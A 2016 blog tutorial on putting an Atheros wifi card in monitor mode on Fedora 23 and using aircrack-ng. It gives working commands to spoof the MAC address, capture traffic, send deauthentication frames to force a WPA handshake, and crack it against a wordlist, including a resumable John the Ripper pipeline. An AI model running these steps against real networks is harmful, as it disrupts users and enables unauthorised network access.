Saturday, 6 February 2016

Fedora 23 / Aircrack on HP Mini 210 3025sa

Working with airmon-ng on Fedora 23 running on HP Mini 210 3025sa with an Atheros AR9285 wifi card using stock kernel ath9k module.

Firstly we need to stop all services that may interfere with the wireless interface - we can let airmon tell us what it thinks might be troublesome and then stop these. Letting airmon stop them (via airmon-ng kill) does not prevent other tools/monitors from restarting these processes. To start, disconnect from all wireless networks.
$ airmon-ng check
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
  769 NetworkManager
  779 avahi-daemon
  785 avahi-daemon
  891 wpa_supplicant

$ service avahi-daemon stop
$ service NetworkManager stop
$ service wpa_supplicant stop

Verify that the interface is down (there's no 'UP' flag)
$ ifconfig wlo1 down && ifconfig -a
...
wlo1: flags=802  mtu 1500

At this point the wireless card is down and disconnected and we will need to put the card into monitor mode. To manually do this: $ iwconfig wlo1 mode monitor will leave you the same interface in the desired mode. To let airmon-ng handle this:

$ airmon-ng start wlo1
PHY Interface Driver  Chipset

phy0 wlo1  ath9k  Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
  (mac80211 monitor mode vif enabled for [phy0]wlo1 on [phy0]wlo1mon)
    (mac80211 station mode vif disabled for [phy0]wlo1)

# verify monitor mode and also the interface name change
$ iwconfig
...
wlo1mon   IEEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=15 dBm   
$ ifconfig -a
...
wlo1mon: flags=4163  mtu 1500

$ ifconfig      wlo1mon down
$ macchanger -r wlo1mon
$ ifconfig      wlo1mon up

At this stage we can use this newly created logical wlo1mon interface
# see what is around, only connected clients
$ airodump-ng -a wlo1mon

# see only on specific bssid/essid on given channel as found from above
# writing out the capture details in /tmp/wifi.cap
$ airodump-ng -d bssid -c channel wlo1mon -w /tmp/wifi

# deauth
$ aireplay-ng --deauth 1 -a bssid -c client mac

# attempt to pen-test the handshake (if logged) using the dictionary file -w
# if the capture file contains more than one bssid, use -b to specify for non
# interactive use
$ aircrack-ng /tmp/wifi.cap -w /usr/share/dict/darkc0de

For long running/resumable penetration testing, John The Ripper can be used in conjunction with aircrack-ng.

# setup john the ripper help pentest but using session
$ john --session=foo --stdout --wordlist=/usr/share/dict/darkc0de | \
    aircrack-ng -w - \
 -b 00:11:22:33:44:55 /tmp/wifi.cap

# use 'q' or Ctrl-C to pause cracking

# restart cracking
$ john --restore=foo | \
    aircrack-ng -w - \
 -b 00:11:22:33:44:55 /tmp/wifi.cap


To clean up the logical interfaces created and return the wireless interface for normal use:

$ airmon-ng stop wlo1
$ for i in wpa_supplicant avahi-daemon NetworkManager; do service $i start ; done
At this point bring back the connection in the NetworkManager and go about your day.

No comments:

Post a Comment